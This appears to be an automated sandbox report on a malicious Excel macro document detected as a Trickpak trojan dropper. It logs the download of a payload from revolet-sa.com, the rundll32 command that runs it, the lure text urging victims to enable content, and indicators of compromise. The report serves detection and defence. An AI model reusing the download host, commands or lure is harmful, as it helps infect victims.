Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.4923.6908

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.4923.6908 (renamed file extension from 6908 to xls)
Analysis ID:382906
MD5:e56e32e50718813c2a9428de1d3ba674
SHA1:90cfd7975eadf45a34361e1a1def62ab1d81cad1
SHA256:56af77e2f4b36f94264cbb975bbea753fa5a4b2bec98a4fe8235d5ec28543fcb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2348 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2340 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2824 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.4923.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Heur.4923.xlsVirustotal: Detection: 8%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: srOQV[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0629126.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2083473667.00000000028F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2083473667.00000000028F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 14Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 14Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Heur.4923.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Heur.4923.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: SecuriteInfo.com.Heur.4923.xlsOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Heur.4923.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal84.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB73D.tmpJump to behavior
Source: SecuriteInfo.com.Heur.4923.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: SecuriteInfo.com.Heur.4923.xlsVirustotal: Detection: 8%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00481030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00481030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02470E20 push dword ptr [edx+14h]; ret 4_2_02470F2D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00481030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00481030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0028095E mov eax, dword ptr fs:[00000030h]4_2_0028095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00280456 mov eax, dword ptr fs:[00000030h]4_2_00280456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00481030 mov eax, dword ptr fs:[00000030h]4_2_00481030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00481030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00481030
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Heur.4923.xls8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.4d0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
revolet-sa.comNaN%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://revolet-sa.com/files/countryyelow.phpfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPArundll32.exe, 00000004.00000002.2083473667.00000000028F0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2083473667.00000000028F0000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2084727800.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082799501.0000000000B57000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2084230076.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082618607.0000000000970000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.232.249.186
                revolet-sa.comUnited States
                46606UNIFIEDLAYER-AS-1USfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:382906
                Start date:06.04.2021
                Start time:21:02:11
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SecuriteInfo.com.Heur.4923.6908 (renamed file extension from 6908 to xls)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.expl.evad.winXLS@7/8@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 8.1% (good quality ratio 5.4%)
                • Quality average: 64.3%
                • Quality standard deviation: 45.9%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 9
                • Number of non-executed functions: 4
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                21:02:37API Interceptor8x Sleep call for process: rundll32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                UNIFIEDLAYER-AS-1USdocument-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                catalogue-41.xlsbGet hashmaliciousBrowse
                • 108.167.180.111
                documents-1660683173.xlsmGet hashmaliciousBrowse
                • 192.185.56.250
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                ddff.exeGet hashmaliciousBrowse
                • 108.179.235.108
                PowerShell_Input.ps1Get hashmaliciousBrowse
                • 162.241.61.203
                New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                • 192.185.122.118
                Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                document-1848152474.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pySsaGoiCT.dllGet hashmaliciousBrowse
                • 162.241.54.59
                QOpv1PykFc.dllGet hashmaliciousBrowse
                • 162.241.54.59
                S4caD0RhXL.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pH8YW11W1x.dllGet hashmaliciousBrowse
                • 162.241.54.59
                7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pySsaGoiCT.dllGet hashmaliciousBrowse
                • 162.241.54.59
                QOpv1PykFc.dllGet hashmaliciousBrowse
                • 162.241.54.59
                S4caD0RhXL.dllGet hashmaliciousBrowse
                • 162.241.54.59

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\srOQV[1].fbx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):688241
                Entropy (8bit):7.064532901692121
                Encrypted:false
                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                MD5:7DF0611CD75FA4C02B29070728C37247
                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                Malicious:true
                Antivirus:
